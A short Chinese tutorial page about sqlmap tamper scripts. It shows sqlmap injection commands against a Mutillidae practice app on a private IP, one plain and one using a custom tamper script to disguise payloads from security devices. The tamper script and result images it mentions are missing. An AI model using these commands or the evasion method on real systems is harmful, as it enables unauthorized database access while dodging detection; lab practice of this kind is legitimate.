当前位置: 代码迷 >> 综合 >> SQLMAP-绕过脚本,混淆脚本
  详细解决方案

SQLMAP-绕过脚本,混淆脚本

热度:83   发布时间:2023-12-24 19:38:20.0

sqlmap-tamper 在kali 的储存位置为/usr/share/sqlmap/tamper

 

当我们对于一些特殊的字符做替换的时候我们可以通过tamper中的脚本进行自动化的更改我们发送的payload

                                        这里举个注入的例子

我们正常的攻击求如下:

sqlmap 上普通注入命令如下:
sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --dbs

sqlmap 上普通注入下安全设备检测的结果:

可见攻击的语句没有做过任何的混淆,那么我们如何通过自定义的脚本将里面的一些敏感字替换掉呢?下面的tamper就是为了解决这种混淆的问题产生的。

这里看一个简单地案例:这个是写的一个test.py

 

sqlmap 上加了tamper注入命令如下:

sqlmap -u "http://192.168.1.134/mutillidae/index.php?page=user-info.php&username=asdmin*&password=asdmin*&user-info-php-submit-button=View+Account+Details" --tamper=test.py --dbs

sqlmap 上加了tamper注入下安全设备检测的结果: 

 这样就成功的替换掉了相应的敏感字符。